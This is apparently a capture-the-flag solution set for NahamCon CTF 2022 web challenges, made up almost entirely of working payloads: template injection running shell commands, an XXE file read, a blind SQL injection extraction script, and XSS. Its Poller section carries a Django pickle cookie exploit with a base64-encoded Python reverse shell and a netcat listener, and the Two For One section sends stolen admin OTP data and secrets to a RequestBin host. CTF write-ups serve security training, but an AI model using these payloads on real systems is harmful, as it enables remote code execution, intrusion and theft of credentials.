NahamCon CTF 2022 - Solution

Deafcon.md

Challenge Deafcon (SSTI and Normalize)

name=taidh&email=taidh@cc{{joiner.__init__.__globals__.os.popen（'cat${IFS}flag*'）.read（）}}

EXtravagant.md

Challenge EXtravagant (XXE Injection)

• Upload file taidh.xml

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY payload SYSTEM 'file:///var/www/flag.txt'>]><root>&payload;</root>

• Request to HOST:PORT/XML?file=taidh.xml

Flaskmetal Alchemist.py

# SQLite Injection (Order by)
import requests
import string
import re

URL = "http://challenge.nahamcon.com:31423" # Change URL
res_regex = '<td style="width:20%">(.*?)</td>'
flag = ''

for i in range(1,500):
    for char in string.ascii_letters + '_{}':
        print(char,end='\r')
        data = {'search':'a','order':f'(case when (substr((select flag from flag),{i},1)="{char}") then atomic_number else name end)'}
        r = requests.post(URL, data=data)
        res = re.findall(res_regex,r.text)[0]
        if "12" in res:
            flag += char
            print(flag)
            break

Hacker Ts.md

Challenge Hacker Ts (XSS)

<h1 id=taidh></h1>
<script>
	var a = new XMLHttpRequest();
	a.open("GET","http://localhost:5000/admin",false);
	a.send();
	document.getElementById('taidh').innerHTML = a.responseText;
</script>

Personnel.md

Challenge Personnel (Regex Injection)

POST / HTTP/1.1
Host: challenge.nahamcon.com:30349
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Connection: close

setting=0&name=|.*|

Poller.md

Challenge Poller (Picker Serialize and Reveal the SECRET_KEY - Django)

• Find SECRET_KEY in source github

  • Fake SECRET_KEY -> Link
  • The right SECRET_KEY -> Link

• Picker Serialize Recommended to use Django 4.0.4

import os
import django.core.signing
import pickle
import base64
import django.contrib.sessions.serializers as serializers

SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!'
salt = 'django.contrib.sessions.backends.signed_cookies'

class Command(object):
    def __reduce__(self):
        return (os.system,("echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiW0ldIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9zaCIpJwo= | base64 -d | sh",)) # Decode string base64 and change to your IP vps

my_cookie= django.core.signing.dumps(Command(),key=SECRET_KEY,salt= salt, serializer=serializers.PickleSerializer,compress=True)

print(my_cookie)

• nc -lvnp 4444 in your VPS
• Change above cookie to sessionid

Two For One.md

Challenge Two For One (Leak OTP and XSS)

There are xss in feedback

• Leak OTP admin

<script>fetch('/reset2fa',{method: 'POST'}).then(r=>r.json()).then(r=>{fetch('http://[RequestBin]?cc='+r.url);});</script>

Then login at Google Authenticator with username admin and secret receive

• Show secret of admin

<script>
fetch('/show_secret', {
    method: 'POST',
    headers: {
      'Accept': 'application/json',
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({otp: 680661, secretId: 1}) //change OTP
  }).then(r=>r.text()).then(r=>{fetch('http://[RequestBin]?cc='+btoa(r));});
</script>